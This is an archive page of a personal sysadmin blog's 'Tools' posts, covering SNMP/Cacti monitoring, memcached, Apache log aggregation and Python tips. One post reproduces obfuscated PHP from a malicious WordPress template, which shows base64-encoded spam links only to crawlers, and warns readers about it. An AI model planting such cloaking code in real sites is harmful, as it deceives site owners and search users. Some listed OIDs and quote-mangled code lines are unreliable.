Netuality

Taming the big bad websites

Archive for the ‘Tools’ Category

Joke of the day: Amazon Cloud Drive app …

leave a comment

… which according to VentureBeat and various media outlets is a Dropbox competitor that “allows you to seamlessly drag and drop files from your computer to the cloud with little work“. Not!

Guess what, it’s about file synchronization. File. Synchronization. Fully-fledged both-ways file syncing from all my laptops and devices to the cloud and back, not just “uploading a file to the cloud with little work“.

I guess the new SkyDrive and Google Drive tools are putting a lot of pressure, but if this app is the answer then it’s a bad one. Come on, Amazon, you can do better!

 

Written by Adrian

May 5th, 2012 at 11:24 pm

Posted in Tools

Tagged with , ,

Google: sorry, but Lisp/Ruby/Erlang not on the menu

7 comments

Yes, language propaganda again. Ain’t it fun ?

Here comes a nice quote from the latest Steve Yegge post (read it entirely if you have the time, it’s both fun and educational – at least for me). So, there:

I made the famously, horribly, career-shatteringly bad mistake of trying to use Ruby at Google, for this project. And I became, very quickly, I mean almost overnight, the Most Hated Person At Google. And, uh, and I’d have arguments with people about it, and they’d be like Nooooooo, WHAT IF… And ultimately, you know, ultimately they actually convinced me that they were right, in the sense that there actually were a few things. There were some taxes that I was imposing on the systems people, where they were gonna have to have some maintenance issues that they wouldn’t have. [...] But, you know, Google’s all about getting stuff done.

[...]

Is it allowed at Google to use Lisp and other languages?

No. No, it’s not OK. At Google you can use C++, Java, Python, JavaScript… I actually found a legal loophole and used server-side JavaScript for a project.

Mmmmm … key ?

Written by Adrian

May 29th, 2008 at 12:35 am

Posted in Tools

Tagged with , , , ,

Java going down, Python way up, and more …

8 comments

According to O’Reilly Radar, sales of Java books have declined in the last 4 years by almost 50%. C# is selling more books from year to year and will probably level up with Java in 2008. Javascript is on the rise (due to AJAX, for sure) and PHP is on a surprising decrease path (although the job statistics indicate quite the contrary).

According to O’Reilly Radar, sales of Java books have declined in the last 4 years by almost 50%

In 2007, the number of sold Ruby books was larger than the number of Python books. In their article they qualify Ruby as being a “mid-major programming language” and Python as “mid-minor programming language”. However, after the announcement of Google App Engine the number of Python downloads from ActiveState has tripled in May. This should become visible in the book sales statistics, pretty soon.

Written by Adrian

May 24th, 2008 at 5:36 pm

Posted in Tools

Tagged with , , , , ,

Nasty WordPress template scam

one comment

Moving my blog to the WordPress platform, I wanted to install a template somewhat nicer than the default. This is how I discovered a potentially very harmful stunt which some blackhats are pulling in free WordPress templates. What they do is build sort of “template farms” where they keep a directory of hundreds or maybe thousands of templates. As these sites are very well optimized for search engines, they rank pretty high when the unsuspecting victim is looking for some free templates. Sometimes, the victim just downloads a nice-looking template from a seemingly inocuous blog hosted on a free platform (wordpress.com,blogger,etc.).

Do not install a WordPress template without performing at least a cursory security audit. Let me remind you that the view layer in WordPress is just another PHP script with full power to do anything a PHP script can do on your server. This is what the template I’ve downloaded contained embedded in multiple source files (sidebar, archive, etc.):

if(strstr($_SERVER['HTTP_USER_AGENT'],base64_decode(‘Ym90′))){echo base64_decode(
‘PGEgaHJlZj1cImh0dHA6Ly93d3cuYmVzdGZyZWVzY3JlZW5zYXZlci5jb21cIiBjbGFzcz1cInNw
YWNpbmctZml4XCI+RnJlZSBDZWxlYnJpdHkgU2NyZWVuc2F2ZXJzPC9hPjxhIGhyZWY9XCJodHRw
Oi8vd3d3LnNrb29ieS5jb21cIiBjbGFzcz1cInNwYWNpbmctZml4XCI+RnJlZSBPbmxpbmUgR2Ft
ZXM8L2E+’);}

Basically, this means that any UserAgent containing the word “bot” (thus, all the mainstream search engine bots/site crawlers) will see a couple of spammy links on all the pages of the blog. Obviously it could have been much worse, as one can reveal the database access coordinates and other server-related dangerous things when a blackhat bot identified by a specially crafted UserAgent text is scanning the blog. The simplest form of audit one can do is to search for base64 and eval functions in the PHP source code as these are generally used to disguise malware.

Written by Adrian

October 21st, 2007 at 5:15 pm

Posted in Tools

Tagged with , , , ,

Programming is hard – the website

leave a comment

A newcomer in the world of “code snippets” sites in programmingishard.com. Although the site is a few months old, only recently it started to gain some steam. Unlike its competition Krugle and Koders, this is not a code search engine but a snippet repository entirely tag-based, user-built. The author has a blog at tentimesbetter.com.

As for watering your mouth, this is a Python code fragment that I found on the site, for the classic inline conditional which does not exist “such as” in Python:

n = ['no', 'yes'][thing == 1]

Obviously it has the big disadvantage of having to compute both values no matter what the condition thing is, but is very short and elegant. Simple but nice code sugar.

Written by Adrian

August 2nd, 2006 at 11:07 pm

Posted in Tools

Tagged with , ,

Monitoring memcached with cacti

3 comments

Memcached is a clusterable cache server from Danga. Or, as they call, it a distributed memory object caching system. Well, whatever. Just note that memcached clients exist for lots of languages (Java, PHP, Python, Ruby, Perl) – mainstream languages in the web world. A lighter version of server was rewritten in Java by Mr. Jehiah Czebotar. Major websites such as Facebook, Slashdot, Livejournal and Dealnews use memcached in order to scale for the huge load they’re serving. Recently, we needed to monitor the memcache servers on a high-performance web cluster serving the Planigo websites. By googling and reading the related newsgroups, I was able to find two solutions:

  • from faemalia.net, a script which is integrated with the MySQL server templates for Cacti. Uses the Perl client.
  • from dealnews.com, a dedicated memcached template for Cacti and some scripts based on the Python client. The installation is thoroughly described here.

These two solutions have the same approach – provide a specialized Cacti template. The charts drawn by these templates are based on data extracted by the execution of memcached client scripts. Maybe very elegant, but could become a pain in the dorsal area. Futzing with Cacti templates was never my favorite pasttime. Just try to import a template exported from a different version of Cacti and you’ll know what I mean. In my opinion, there is a simple way, which consists in installing a memcached client on all the memcached servers, then extracting the statistical values using a script. We’ll use the technique described in one of my previous posts, to expose script results as SNMP OID values. Then, track these values in Cacti via the generic existing mechanism. My approach has the disadvantage of installing a memcached client on all the servers. However, it is very simple to build your own charts and data source templates, as for any generic SNMP data. All you need now a simple script which will print the memcached statistics, one per line. I will provide one-liners for Python, which will obviously work only on machines having Python and the “tummy” client installed. This is the recipe (default location of Python executable on Debian is /usr/bin/python but YMMV):

1. first use this one liner as snmpd exec :

/usr/bin/python -c “import memcache; print (‘%s’%[memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1],]).replace(“‘”,”).replace(‘,’,'n’).replace(‘[','')
.replace(']‘,”).replace(‘{‘,”).replace(‘}’,”)”

This will display the name of the memcached statistic along with its value and will allow you to hand pick the OIDs that you want to track. Yes, I know it could be done simpler with translate instead of multiple replace. Left as an exercise for the Python-aware reader.

2. after having a complete list of OIDs use this one-liner:

/usr/bin/python -c “import memcache; print ‘##’.join(memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1].values()).replace(‘##’,'n’)”

The memcached statistics will be displayed in the same order, but only their values not their names.

And this is the mandatory eye candy:



Written by Adrian

August 2nd, 2006 at 10:54 pm

Posted in Tools

Tagged with , , , , , , ,

Monitoring Windows servers – with SNMP

5 comments

UPDATE: Did you knew there’s an official Cacti guide? Find it at Cacti 0.8 Beginner’s Guide. For more info about SNMP please don’t hesitate to take a look at Essential SNMP, Second Edition.

My previous article was focused on Linux monitoring. Often, you’ll have in your datacenter at least a few Windows machines. SQL Server is one of the best excuses these days to get a Microsoft machine in your server room – and you know what, it’s a decent database – well, at least for medium-sized companies like the one I’m working for right now.

It is less known, but yes you can have SNMP support out of the box with Windows 2000 and XP, and it doesn’t need to be the Server flavor [obiously it works the same in 2003 Server]:

  1. Invoke the Control Panel.
  2. Double click the Add/Remove Programs icon.
  3. Select Add/Remove Windows Components. The Windows Component Wizard is displayed.
  4. Check the Management and Monitoring Tools box.
  5. Click the Details button.
  6. Check the Simple Network Management Protocol box and click OK, then Next. You may have to reboot the machine.

After the server is installed, the SNMP service has to be configured. Here’s how:

  1. Invoke the Control Panel.
  2. Double click the Administrative Tools icon.
  3. Double click the Services icon.
  4. Select SNMP Service.
  5. Choose the Security tab.
  6. Add whatever community name is used in your network. Chances are in a local internal LAN the default public works out of the box.
  7. For a sensitive server, you may want to fiddle a little bit with the IP restriction settings, for instance allowing SNMP communication only with the monitoring machine.
  8. Click OK then restart the service.

Next step is Cacti integration. Unfortunately, there is no Windows-specific profile for devices in Cacti. Therefore if you have lots of Windows machines, you’ll have to define your own. Or, take a Generic SNMP-enabled host and use it as a scaffold for each device configuration.

Out of the graphs and datasources already defined in Cacti [I am using 0.8.6c] only two work with Windows SNMP agents: processes and interface traffic values.

It’s a good start, but if you are serious about monitoring, you need to dig a little bit deeper. Once again, the MIB Browser comes to save the day. It’s very simple, just search on the Windows machine for any .mib files you are able to find, copy on your workstation, load them into the MIB browser and make some recursive walks (Get subtree on the root of the MIB).This way, I was able to find some interesting OID for the Windows machine. For instance, .1.3.6.1.2.1.25.3.3.1.2.1 -> .1.3.6.1.2.1.25.3.3.1.2.4 the OID for CPU load on each of the 4 virtual CPUs [it's a dual Xeon with HT].

Memory-related OIDs for my configuration are :

  • .1.3.6.1.2.1.25.2.3.1.5.6 – Total physical memory
  • .1.3.6.1.2.1.25.2.3.1.6.6 – Used physical memory
  • .1.3.6.1.2.1.25.2.3.1.6.6 – Total virtual memory ["virtual"="swap" in Windows lingo]
  • .1.3.6.1.2.1.25.2.3.1.6.6 – Used virtual memory

Here’s a neat memory chart for a windows machine. Notice that the values are in “blocks” which in my case is 64kb. The total physical memory is 4GB.

Most hardware manufacturers do offer SNMP agents for their hardware, as well as the corresponding .mib file . In my case, I was able to install an agent to monitor an LSI Megaraid controller. Here is a chart for the number of disk operations/second:

In one of my next articles, we’ll take a look together at the way you can export “non-standard” data over SNMP from Windows, in the same manner we did on Linux, using custom scripts. Till then, have an excellent week.

Written by Adrian

May 12th, 2006 at 6:52 pm

Posted in Tools

Tagged with , , , ,

Unicode in Python micro-recipe : from MySQL to webpage via Cheetah

leave a comment

Very easy:

  • start by adding the default-character-set=utf8 in your MySQL configuration file and restart the database server
  • apply this recipe from Activestate Python Cookbook (“guaranteed conversion to unicode or byte string”)
  • inside the Cheetah template, use the ReplaceNone filter:


#filter ReplaceNone
${myUnicodeString}
#end filter

in order to prevent escaping non-ASCII characters.

Now. That’s better.

Written by Adrian

April 14th, 2006 at 11:42 pm

Posted in Tools

Tagged with , , , ,

Monitor everything on your Linux servers – with SNMP and Cacti

6 comments

UPDATE: Did you knew there’s an official Cacti guide? Find it at Cacti 0.8 Beginner’s Guide. For more info about SNMP please don’t hesitate to take a look at Essential SNMP, Second Edition.

Two free open-source tools are running the show for network and server-activity monitoring. The oldest and quite popular among network and system administrators is Nagios. Nagios does not only do monitoring, but also event traps, escalation and notification. The younger challenger is called Cacti. Unlike Nagios, it’s written in a scripting language [PHP] so no compiling is necessary – it just runs out of the box1. Cacti’s problem is that – at its current version – is missing lots of real-time features such as monitoring and notification. All these features are scheduled to be integrated in future versions of the product, but as with any open-source roadmap nothing is guaranteed, Anyway, this article is focusing on Cacti integration because it’s what I am currently using.

Cacti is built upon an open-source graphing tool called MRTG and a communication protocol SNMP. SNMP is not exactly a developer’s cup of tea, being more of a network administrator’s tool2. However, a monitoring server comes extremely handy in performance measurement and tuning, especially for complex performance behavior which can only be benchmarked long-term : such as large caches impact on a web application, or performance of long-running operations.

But is that specific variable you need to monitor, available with SNMP out of the box ? There is a strong chance it is. SNMP being an extensible protocol, lots of organization have recorded their own MIBs and respective implementations. Basically, a MIB is a group of unique identifiers called OIDs. An OID is a sequence of numbers separated by dots, for instance ‘.1.3.6.1.4.1.2021.11′; each number has a special meaning in a standard object tree – this example, the meaning of ‘.1.3.6.1.4.1.2021.11′ is ‘.iso.org.dod.internet.private.enterprises.ucdavis.systemStats’. Even you can have your own MIB in the ‘.iso.org.dod.internet.private.enterprises’ tree, by applying on this page at IANA.

Most probably you don’t really need your own MIB, no matter how ‘exotic’ your monitoring is, because:

a) it’s already there, in the huge list of existing MIBs and implementations

and

b) you are not bound to the existing official MIBs, in fact you can create your own MIB as long as you replicate it in the snmp configuration on all the servers that you want to monitor.

To take a look at existing MIBs, free tools are available on the net, IMHO the best one being MibBrowser. This multiplatform [Java] MIB browser has a free version which should be more than enough for our basic task. The screen capture shown here depicts a “Get Subtree” operation on the ‘.1.3.6.1.4.1.2021.11′ MIB; the result is a list of single value MIBs, such for instance ‘.1.3.6.1.4.1.2021.11.11.0′ which has the alias ‘ssCpuIdle.0′ and value 97 [meaning that the CPU is 97% idle]. You can see the alias by loading the corresponding MIB file [select File/Load MIB then choose 'UCD-SNMP-MIB.txt' from the list of predefined MIBs].

From command line, in order to display existing MIB values, you can use snmpwalk:

snmpwalk -Os -c [community_name] -v 1 [hostname] .1.3.6.1.4.1.111111.1

3 and the result is:

.1.3.6.1.4.1.2021.11 OID (.iso.org.dod.internet.private.enterprises.ucdavis.systemStats)
snmpwalk -v 1 -c sncq localhost .1.3.6.1.4.1.2021.11
UCD-SNMP-MIB::ssIndex.0 = INTEGER: 1
UCD-SNMP-MIB::ssErrorName.0 = STRING: systemStats
UCD-SNMP-MIB::ssSwapIn.0 = INTEGER: 0
UCD-SNMP-MIB::ssSwapOut.0 = INTEGER: 0
UCD-SNMP-MIB::ssIOSent.0 = INTEGER: 4
UCD-SNMP-MIB::ssIOReceive.0 = INTEGER: 2
UCD-SNMP-MIB::ssSysInterrupts.0 = INTEGER: 4
UCD-SNMP-MIB::ssSysContext.0 = INTEGER: 1
UCD-SNMP-MIB::ssCpuUser.0 = INTEGER: 2
UCD-SNMP-MIB::ssCpuSystem.0 = INTEGER: 1
UCD-SNMP-MIB::ssCpuIdle.0 = INTEGER: 96
UCD-SNMP-MIB::ssCpuRawUser.0 = Counter32: 17096084
UCD-SNMP-MIB::ssCpuRawNice.0 = Counter32: 24079
UCD-SNMP-MIB::ssCpuRawSystem.0 = Counter32: 6778580
UCD-SNMP-MIB::ssCpuRawIdle.0 = Counter32: 599169454
UCD-SNMP-MIB::ssCpuRawKernel.0 = Counter32: 6778580
UCD-SNMP-MIB::ssIORawSent.0 = Counter32: 998257634
UCD-SNMP-MIB::ssIORawReceived.0 = Counter32: 799700984
UCD-SNMP-MIB::ssRawInterrupts.0 = Counter32: 711143737
UCD-SNMP-MIB::ssRawContexts.0 = Counter32: 1163331309
UCD-SNMP-MIB::ssRawSwapIn.0 = Counter32: 23015
UCD-SNMP-MIB::ssRawSwapOut.0 = Counter32: 13730

Each of this values has its own significance, like for instance ‘ssCpuIdle.0′ which announces that the CPU is 96% idle.
In order to retrieve just a single value of the list, use its alias as a parameter to the snmpget command, for instance

snmpget -Os -c [community_name] -v 1 [hostname] UCD-SNMP-MIB::ssCpuIdle.0

Sometimes, you want to monitor something which you do not seem to find in the list of MIBs. Say, for instance, the performance of a MySQL database that your’re pounding pretty hard with your webapp4. The easiest way of doing this is to pass through a script – snmp implementations can take the result of any script and expose it through the protocol, line by line.

Supposing you want to keep track of the values obtained with the following script:

#!/bin/sh
/usr/bin/mysqladmin -uroot status | /usr/bin/awk '{printf("%fn%dn%dn",$4/
10,$6/1000,$9)}'

The mysqladmin command and a bit of simple awk magic display the following three values, each on a separate line:

  • number of opened connections / 10
  • number of queries / 1000
  • number of slow queries

It is interesting to not that, while the first value is instantaneous gauge-like, the following two are incremental, growing and growing as long as new queries and new slow queries are recorded. Will keep this in mind for later, when we will track these values.

But for now, let’s see how these three values are exposed through snmp. The first step is to tell the SNMP daemon that the script has an associated MIB. This is done in the configuration file, usually located at /etc/snmp/snmp.d. The following line attaches the script [for example /home/user/myscript.sh] execution to a certain OID:

exec .1.3.6.1.4.1.111111.1 MySQLParameters /home/user/myscript.sh

the ‘.1.3.6.1.4.1.111111.1′ OID is a branch of ‘.1.3.6.1.4.1′ [meaning '.iso.org.dod.internet.private.enterprises']. We tried to make it look ‘legitimate’ but obviously you can use here any sequence you want to.

After restarting the daemon, let’s interrogate Mibbrowser for the freshly created OID, see the following image snmpwalk -Os -c [community_name] -v 1 [hostname] .1.3.6.1.4.1.111111.1 ; the result is:

enterprises.111111.1.1.1 = INTEGER: 1
enterprises.111111.1.2.1 = STRING: "MySQLParameters"
enterprises.111111.1.3.1 = STRING: "/etc/snmp/mysql_params.sh"
enterprises.111111.1.100.1 = INTEGER: 0
enterprises.111111.1.101.1 = STRING: "0.900000"
enterprises.111111.1.101.2 = STRING: "18551"
enterprises.111111.1.101.3 = STRING: "108"
enterprises.111111.1.102.1 = INTEGER: 0
enterprises.111111.1.103.1 = ""

Great ! Now we have the proof that it really works and our specific values extracted with a custom script are visible through SNMP. Let’s go back to Cacti and see how we can make some nice charts out of them5.

Cacti has this nice feature of defining ‘templates’ that you can reuse afterwards. My strategy is to define a data template for each one of the 3 parameters I want to chart, using the ‘Duplicate’ function applied to the ‘SNMP – Generic OID Template’.

On the duplicate datasource template, you have to change the datasource title, name to display in charts, data source type [use DERIVE for incremental counters and GAUGE for instantaneous values], specific OID and the snmp community. Do it for the three values.

Using the three new datasource templates, create a chart template for ‘MySQL Activity’. That’s a bit more complicated, but it boils down to the following procedure, repeated for each of the 3 data sources:

  • add a data source and associate a graph [I always use AREA for the first graph as a background and LINE3 for the other, but it's just a matter of taste]
  • associate labels with current or computed values: CURRENT, AVERAGE, MAX in this example

All the rest is really fine tuning – deciding for better colors, wether to use autoscale or fixed scale and so on. By now, your graph template should be ready to use.

Note that for the incremental values ['DERIVE' type data sources] I’ve used titles such as ‘Thousands queries/5 min’ – the 5 minutes come from the Cacti poller which is set to query for data each 5 minutes. The end result is something like this one :

On this real production chart you’ll see a few interesting patterns. For instance, at 3 o’clock in the morning, there is a huge spike in all the charted parameters – indeed, a cron’ed script was provoking this spike. From time to time, a small burst of slow queries is recorded – still under investigation. What is interesting here is that these spikes were previously undetectable on the load average chart, which look clean and innocuous:

To conclude, SNMP is a valuable resource for server performance monitoring. Often, investigating specific parameters and displaying them in tools such as Cacti can bring interesting insights upon the behavior of servers.

Some SNMP implementations in different programming languages:

  • Java: Westhawk’s Java SNMP stack [free w commercial support], AdventNet SNMP API [commercial, with a feature-restricted un-expiring free version], iREASONING SNMP API [commercial implementation], SNMP4J [free and feature-rich implementation - thank you Mathias for the tip]
  • PHP: client-only supported by the php-snmp extension, part of the PHP distribution [free]
  • Python: PySNMP is a Python SNMP framework, client+agents [free].
  • Ruby: client-only implementation Ruby SNMP [free]

1 If you’re running Debian, Cacti comes with apt so it’s a breeze to install and run [apt-get install cacti]

2 a bit out of the scope of this article, SNMP also allows writing values on remote servers, not only retrieving monitored values.

3 Replace [hostname] with the server hostname and [community_name] with the SNMP community – default being ‘public’. The SNMP community is a way of authenticating a client to a SNMP server; although the system can be used for pretty sophisticated stuff, most of the time the servers have a read-only passwordless community, visible only in the internal network for monitoring purposes.

4 In fact, a commercial implementation of SNMP for MySQL does exist.

5 The procedure described here applies to Cacti v0.8.6.c

Written by Adrian

March 5th, 2006 at 5:27 pm

Posted in Tools

Tagged with , , , , , , , ,

Aggregating webservers logs for an Apache cluster

one comment

One of the ways of scaling a heavy-traffic LAMP web application is to transform the server into a cluster of servers. Some may opt to walk on the easy path by using an overpriced appliance load balancer, but the most daring [and budget-restrained] will go for free software solutions such as pound or haproxy.

Although excellent performers, these free balancers have lots of missing features when compared with counterpart commercial solutions. One of the most embarrassing misses is the lack of flexibility in producing decent access logs. Both pound (LogLevel 4) and haproxy (option httplog) may generate Apache-like logs in their logfiles or the syslog, however none offers the level of customization encountered in Apache. Basically, you're left with using the logs from the cluster nodes. These logs present a couple of problems:

  • the originating IP is always the internal IP of the balancer
  • there is one log/node, while log analysis tools can usually cope with a single log file/report

First problem is relatively easy to solve. Start by activating the X-Forwarded-For header in the balancing software : for instance configuring haproxy with option forwardfor. A relatively unknown Apache module called mod_rpaf will solve the tedious task of extracting the remote IP from X-Forwarded-For header and copying it in the remote address field of Apache logs. For Debian Linux fans, it's nice to note that libapache-mod-rpaf is available via apt.

Now that you have N realistic Apache weblogs, 1 per cluster node, you just have to concatenate and put them in a form understandable by your log analysis tools. Just simply cat-ing them in a big file, won't cut it [arf] because new records will appear in different regions of the file instead of appending chronologically to its tail. The easiest solution in that case is to perform a sort on these logs. Although I am aware of the vague possibility of sorting on the Apache datetime field, even taking the locale into account, I confess my profound inability of finding the right combination of parameters. Instead, I choose to add a custom field in the Apache log; using the following log format:


LogFormat "%h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{Cookie}i" %c %T "%{%Y%m%d%H%M%S}t"" combined

where %{%Y%m%d%H%M%S}t is a standard projection of current datetime in an easily sortable integer, like for instance 20050925120000 – equivalent of 25 Sep 2005 12:00:00. Now, considering the quote as a separator in the Apache log format, is easy to sort upon this custom field [the 10th]:

sort -b -t """ -T /opt -k 10 /logpath/access?.log > /logpath/full.log

And there you are, having this nice huge log file to munch on. On a standard P4 with 1GB of RAM it takes less than a minute to obtain a 2GB log file…

In case the web traffic is really big and log analysis process impacts the existing web activity, use a separate machine instead of overloading one of the cluster nodes. For automated transfer of log files, generate ssh keys on all the cluster nodes for paswordless login from the web analytics server in the web logfiles owner account. Minimization of traffic between these machines is done by installing rsync on them and them using rsync via ssh:

rsync -e ssh -Cavz www-data@node1:/var/log/apache/access.log /logpath/access1.log

Now, you know all the steps required to fully automate the log aggregation and its processing. One may ask why all the fuss when in fact a simple subscription to a ASP style web analytics provider should suffice. Yes, it's true however… The cluster that I've recently configured with this procedure has a few million hits per week. Yes, we're talking about page hits. At this level of traffic, the cost for a web analytics service starts from 10.000$/year. It's certainly a nice amount of money, which will allow you to afford your own analytics tool [such as for instance Urchin v5] and keep some cash from the first year. Some might say that this kind of commercial tools have their own load balancer analysis techniques. Sure, but it all comes with a cost. In the case of Urchin, you just saved 695$/node and some bragging rights with your mates. Relax and enjoy.

PS: Yes we're talking millions of page hits LAMP solution not J2EE… Maybe I'll get into details on another occasion, assuming that somebody is interested. Leave a comment, send a mail or something.

Written by Adrian

September 25th, 2005 at 8:20 pm

Posted in Tools

Tagged with , , ,